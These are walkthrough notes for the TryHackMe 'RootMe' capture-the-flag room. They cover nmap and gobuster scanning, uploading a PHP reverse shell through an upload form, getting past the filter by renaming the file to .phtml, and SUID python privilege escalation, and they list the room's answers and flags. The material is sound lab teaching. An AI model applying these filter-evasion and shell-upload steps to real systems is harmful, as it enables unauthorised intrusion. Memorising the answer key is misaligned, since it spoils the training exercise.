We covered the basic steps of a penetration testing procedure using a beginner friendly CTF challenge froom TryHackMe named RootMe.
Web Hacking & Pentesting Study Notes
Summary & Highlights
Information Gathering & Enumeration
Commands used in this stage:
nmap -sC -sV -oN nmap/rootme <MACHINE_IP>
gobuster dir -u http://<MACHINE_IP> -w <PATH_TO_WORDLIST>
Ports open on the machine:
22/ssh — OpenSSH 7.6p1
80/http — Apache httpd 2.4.29
/panel/ was discovered in the web directory and allows for file upload. Upload this reverse shell, setup your listener and get the first shell session.
Bypassing Upload Filters By Changing Extension
If the previous upload failed, rename the reverse shell and change its extension from php into .phtml and try again.
Room Answers | RootMe TryHackMe
Scan the machine, how many ports are open?
2
What version of Apache is running?
2.4.29
What service is running on port 22?
ssh
What is the hidden directory?
/panel/
Find a form to upload and get a reverse shell, and find the flag.
user.txt
THM{y0u_g0t_a_sh3ll}
Search for files with SUID permission, which file is weird?
/usr/bin/python
Find a form to escalate your privileges.
root.txt
THM{pr1v1l3g3_3sc4l4t10n}
Check out the video below for detailed explanation.
RootMe TryHackMe Video Walkthrough